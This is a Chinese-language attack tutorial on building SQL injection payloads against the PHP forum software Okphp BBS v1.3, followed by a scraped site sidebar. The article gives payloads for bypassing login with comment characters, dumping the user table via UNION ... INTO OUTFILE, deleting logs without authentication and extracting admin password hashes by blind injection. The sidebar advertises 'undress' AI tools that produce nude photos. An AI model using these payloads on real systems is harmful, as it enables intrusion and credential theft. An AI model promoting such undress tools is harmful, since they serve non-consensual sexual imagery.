攻击方法:谈php+mysql注射语句构造
一.前言:
版本信息:Okphp BBS v1.3 开源版
由于PHP和MYSQL本身得原因,PHP+MYSQL的注射要比asp困难,尤其是注射时语句的构造方面更是个难点,本文主要是借对Okphp BBS v1.3一些文件得简单分析,来谈谈php+mysql注射语句构造方式,希望本文对你有点帮助。
声明:文章所有提到的“漏洞”,都没有经过测试,可能根本不存在,其实有没有漏洞并不重要,重要的是分析思路和语句构造。
二.“漏洞”分析:
1.admin/login.php注射导致绕过身份验证漏洞:
代码:
$conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname);
$password = md5($password);
$q = "select id,group_id from $user_table where username=$username and password=$password";
$res = sql_query($q,$conn);
$row = sql_fetch_row($res);
$q = "select id,group_id from $user_table where username=$username and password=$password"中
$username 和 $password 没过滤, 很容易就绕过。(bkJia中文网)
对于select * from $user_table where username=$username and password=$password这样的语句改造的方法有:
构造1(利用逻辑运算):$username= OR a=a $password= OR a=a
相当于sql语句:
select * from $user_table where username= OR a=a and password= OR a=a
构造2(利用mysql里的注释语句# ,/* 把$password注释掉):$username=admin#(或admin/*)
即:
select * from $user_table where username=admin# and password=$password"
相当于:
select * from $user_table where username=admin
在admin/login.php中$q语句中的$password在查询前进行了md5加密所以不可以用构造1中的语句绕过。这里我们用构造2:
select id,group_id from $user_table where username=admin# and password=$password"
相当于:
select id,group_id from $user_table where username=admin
只要存在用户名为admin的就成立,如果不知道用户名,只知道对应的id,
我们就可以这样构造:$username= OR id=1#
相当于:
select id,group_id from $user_table where username= OR id=1# and password=$password(#后的被注释掉)
我们接着往下看代码:
if ($row[0]) {
// If not admin or super moderator
if ($username != "admin" && !eregi("(^|&)3($|&)",$row[1])) {
$login = 0;
}
else {
$login = 1;
}
}
// Fail to login---------------
if (!$login) {
write_log("Moderator login","0","password wrong");
echo "";
exit();
}
// Access ! -------------
else {
session_start();
最后简单通过一个$login来判断,我们只要ie提交直接提交$login=1 就可以绕过了 :)。
2.users/login.php注射导致绕过身份验证漏洞:
代码:
$md5password = md5($password);
$q = "select id,group_id,email from $user_table where username=$username and password=$md5password";
$res = sql_query($q,$conn);
$row = sql_fetch_row($res);
$username没过滤利用同1里注释掉and password=$md5password";
3.adminloglist.php存在任意删除日志记录漏洞。(ps:这个好象和php+mysql注射无关,随便提一下)(bkJia中文网)
okphp的后台好象写得很马虎,所有文件都没有判断管理员是否已经登陆,以至于任意访问。我们看list.php的代码:
$arr = array("del_log","log_id","del_id");
get_r($arr);
//
if ($del_log) {
省略........
if ($log_id) {
foreach ($log_id as $val) {
$q = "delete from $log_table where id=$val";
$res = sql_query($q,$conn);
if ($res) {
$i++;
}
}
}
elseif ($del_id) {
$q = "delete from $log_table where id=$del_id";
$res = sql_query($q,$conn);
}
$tpl->setVariable("message","$i log deleted ok!");
$tpl->setVariable("action","index.php?action=list_log");
}
代码就只简单的用get_r($arr);判断的提交的参数,我们只要提交相应的$del_log,$log_id,$del_id。就回删除成功。
4.多个文件对变量没有过滤导致sql注射漏洞。
okphp的作者好象都不喜欢过滤:)。基本上所有的sql语句中的变量都是“赤裸裸”的。具体那些文件我就不列出来了,请自己看代码,我这里就用forumslist_threads.php为例子简单谈一下。
看list_threads.php的代码:
$q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id=$forum_id";
$res = sql_query($q,$conn);
$row = sql_fetch_row($res);
变量$forum_id没有过滤,因为mysql不支持子查询,我们可以利用union构造语句进行联合查询(要求MySQL版本在4.00以上)实现跨库操作,我们构造如下:
构造1:利用 SELECT * FROM table INTO OUTFILE /path/file.txt(要求mysql有file权限,注意在win系统中要绝对路径,如:c://path//file.txt )。把所查询的内容输入到file.txt,然后我们可以通http://ip/path/file.txt来访问得到查询的结果。上面的我们可以这样构造$forum_id:
$forum_id= union select * from user_table into outfile /path/file.txt
以下:
$q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id=$forum_id union select * from user_table into outfile /path/file.txt"; (bkJia.com)
上面的办法要求比较苛刻,必须得到web的路径(一般可以通过提交错误的变量使mysql报错而得到),而且php的magic_gpc=on选项使注入中不能出现单引号。如果magic_gpc=on我们也可以绕过:
构造2:就象asp跨库查询一样,直接利用union select构造语句,使返回结果不同来猜解,这种方法可以绕过单引号(magic_gpc=on)继续注射,不过在php里这种注射相对困难,根据具体的代码而定。具体的语句构造请参考pinkeyes 的文章《php注入实例》。下面我就结合okphp给个利用“返回结果不同”注射的例子:(见漏洞5)。
5.admin/login.php和users/login.php通过sql语句构造可以猜解得到指定用户密码hash:(其实这个和漏洞1和2是同一个,这里单独拿出来,主要是说明语句构造的方法。)
问题代码同漏洞1。
语句的构造(ps:因为语句本身就是对用户库操作就没必要用union了):
$username=admin AND LENGTH(password)=6#
sql语句变成:
$q = "select id,group_id from $user_table where username=admin AND LENGTH(password)=6# and password=$password"
相当于:
$q = "select id,group_id from $user_table where username=admin AND LENGTH(password)=6"
如果LENGTH(password)=6成立,则正常返回,如果不成立,mysql就会报错。
这样我们就可以猜解用户admin密码hash了。如$username=admin ord(substring(password,1,1))=57#
可以猜用户的密码第一位的ascii码值............。
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1393
52
1207
24
Ten recommended open source free text annotation tools
Mar 26, 2024 pm 08:20 PM
Text annotation is the work of corresponding labels or tags to specific content in text. Its main purpose is to provide additional information to the text for deeper analysis and processing, especially in the field of artificial intelligence. Text annotation is crucial for supervised machine learning tasks in artificial intelligence applications. It is used to train AI models to help more accurately understand natural language text information and improve the performance of tasks such as text classification, sentiment analysis, and language translation. Through text annotation, we can teach AI models to recognize entities in text, understand context, and make accurate predictions when new similar data appears. This article mainly recommends some better open source text annotation tools. 1.LabelStudiohttps://github.com/Hu
15 recommended open source free image annotation tools
Mar 28, 2024 pm 01:21 PM
Image annotation is the process of associating labels or descriptive information with images to give deeper meaning and explanation to the image content. This process is critical to machine learning, which helps train vision models to more accurately identify individual elements in images. By adding annotations to images, the computer can understand the semantics and context behind the images, thereby improving the ability to understand and analyze the image content. Image annotation has a wide range of applications, covering many fields, such as computer vision, natural language processing, and graph vision models. It has a wide range of applications, such as assisting vehicles in identifying obstacles on the road, and helping in the detection and diagnosis of diseases through medical image recognition. . This article mainly recommends some better open source and free image annotation tools. 1.Makesens
How to write a novel in the Tomato Free Novel app. Share the tutorial on how to write a novel in Tomato Novel.
Mar 28, 2024 pm 12:50 PM
Tomato Novel is a very popular novel reading software. We often have new novels and comics to read in Tomato Novel. Every novel and comic is very interesting. Many friends also want to write novels. Earn pocket money and edit the content of the novel you want to write into text. So how do we write the novel in it? My friends don’t know, so let’s go to this site together. Let’s take some time to look at an introduction to how to write a novel. Share the Tomato novel tutorial on how to write a novel. 1. First open the Tomato free novel app on your mobile phone and click on Personal Center - Writer Center. 2. Jump to the Tomato Writer Assistant page - click on Create a new book at the end of the novel.
How to recover deleted contacts on WeChat (simple tutorial tells you how to recover deleted contacts)
May 01, 2024 pm 12:01 PM
Unfortunately, people often delete certain contacts accidentally for some reasons. WeChat is a widely used social software. To help users solve this problem, this article will introduce how to retrieve deleted contacts in a simple way. 1. Understand the WeChat contact deletion mechanism. This provides us with the possibility to retrieve deleted contacts. The contact deletion mechanism in WeChat removes them from the address book, but does not delete them completely. 2. Use WeChat’s built-in “Contact Book Recovery” function. WeChat provides “Contact Book Recovery” to save time and energy. Users can quickly retrieve previously deleted contacts through this function. 3. Enter the WeChat settings page and click the lower right corner, open the WeChat application "Me" and click the settings icon in the upper right corner to enter the settings page.
How to set font size on mobile phone (easily adjust font size on mobile phone)
May 07, 2024 pm 03:34 PM
Setting font size has become an important personalization requirement as mobile phones become an important tool in people's daily lives. In order to meet the needs of different users, this article will introduce how to improve the mobile phone use experience and adjust the font size of the mobile phone through simple operations. Why do you need to adjust the font size of your mobile phone - Adjusting the font size can make the text clearer and easier to read - Suitable for the reading needs of users of different ages - Convenient for users with poor vision to use the font size setting function of the mobile phone system - How to enter the system settings interface - In Find and enter the "Display" option in the settings interface - find the "Font Size" option and adjust it. Adjust the font size with a third-party application - download and install an application that supports font size adjustment - open the application and enter the relevant settings interface - according to the individual
750,000 rounds of one-on-one battle between large models, GPT-4 won the championship, and Llama 3 ranked fifth
Apr 23, 2024 pm 03:28 PM
Regarding Llama3, new test results have been released - the large model evaluation community LMSYS released a large model ranking list. Llama3 ranked fifth, and tied for first place with GPT-4 in the English category. The picture is different from other benchmarks. This list is based on one-on-one battles between models, and the evaluators from all over the network make their own propositions and scores. In the end, Llama3 ranked fifth on the list, followed by three different versions of GPT-4 and Claude3 Super Cup Opus. In the English single list, Llama3 overtook Claude and tied with GPT-4. Regarding this result, Meta’s chief scientist LeCun was very happy and forwarded the tweet and
The secret of hatching mobile dragon eggs is revealed (step by step to teach you how to successfully hatch mobile dragon eggs)
May 04, 2024 pm 06:01 PM
Mobile games have become an integral part of people's lives with the development of technology. It has attracted the attention of many players with its cute dragon egg image and interesting hatching process, and one of the games that has attracted much attention is the mobile version of Dragon Egg. To help players better cultivate and grow their own dragons in the game, this article will introduce to you how to hatch dragon eggs in the mobile version. 1. Choose the appropriate type of dragon egg. Players need to carefully choose the type of dragon egg that they like and suit themselves, based on the different types of dragon egg attributes and abilities provided in the game. 2. Upgrade the level of the incubation machine. Players need to improve the level of the incubation machine by completing tasks and collecting props. The level of the incubation machine determines the hatching speed and hatching success rate. 3. Collect the resources required for hatching. Players need to be in the game
Recommended: Excellent JS open source face detection and recognition project
Apr 03, 2024 am 11:55 AM
Face detection and recognition technology is already a relatively mature and widely used technology. Currently, the most widely used Internet application language is JS. Implementing face detection and recognition on the Web front-end has advantages and disadvantages compared to back-end face recognition. Advantages include reducing network interaction and real-time recognition, which greatly shortens user waiting time and improves user experience; disadvantages include: being limited by model size, the accuracy is also limited. How to use js to implement face detection on the web? In order to implement face recognition on the Web, you need to be familiar with related programming languages and technologies, such as JavaScript, HTML, CSS, WebRTC, etc. At the same time, you also need to master relevant computer vision and artificial intelligence technologies. It is worth noting that due to the design of the Web side
